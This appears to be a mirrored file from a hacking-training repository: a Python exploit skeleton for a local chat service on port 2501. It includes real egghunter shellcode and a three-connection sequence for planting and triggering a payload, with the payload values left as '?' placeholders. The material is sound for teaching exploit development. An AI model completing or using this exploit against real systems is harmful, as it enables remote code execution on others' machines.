mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2025-01-01 00:55:28 +00:00
43 lines
1.1 KiB
Python
43 lines
1.1 KiB
Python
|
#!/usr/bin/python
|
||
|
import os
|
||
|
import socket
|
||
|
import sys
|
||
|
import threading
|
||
|
import struct
|
||
|
import time
|
||
|
|
||
|
HOST="127.0.0.1"
|
||
|
PORT=2501
|
||
|
|
||
|
# Matt Miller Access() egghunter, triggers on "W00TW00T"
|
||
|
egghunter = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
|
||
|
egghunterPayload = ?
|
||
|
msgPayload = ?
|
||
|
|
||
|
# Connect one user
|
||
|
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||
|
sock1.connect((HOST, PORT))
|
||
|
sock1.send("usr1\r\n")
|
||
|
sock1.recv(1024)
|
||
|
print "Connected first user"
|
||
|
|
||
|
# Connect a second user and message the first with the egg
|
||
|
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||
|
sock2.connect((HOST, PORT))
|
||
|
sock2.send("usr2\r\n")
|
||
|
sock2.recv(1024)
|
||
|
time.sleep(1)
|
||
|
print "Connected second user"
|
||
|
sock2.send(msgPayload)
|
||
|
print "Sent msg payload"
|
||
|
|
||
|
# Connect a final user to trigger egghunter in username
|
||
|
sock3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||
|
sock3.connect((HOST, PORT))
|
||
|
sock3.send(egghunterPayload)
|
||
|
print "Sent egghunter payload"
|
||
|
|
||
|
# Close down
|
||
|
sock3.close()
|
||
|
sock2.close()
|
||
|
sock1.close()
|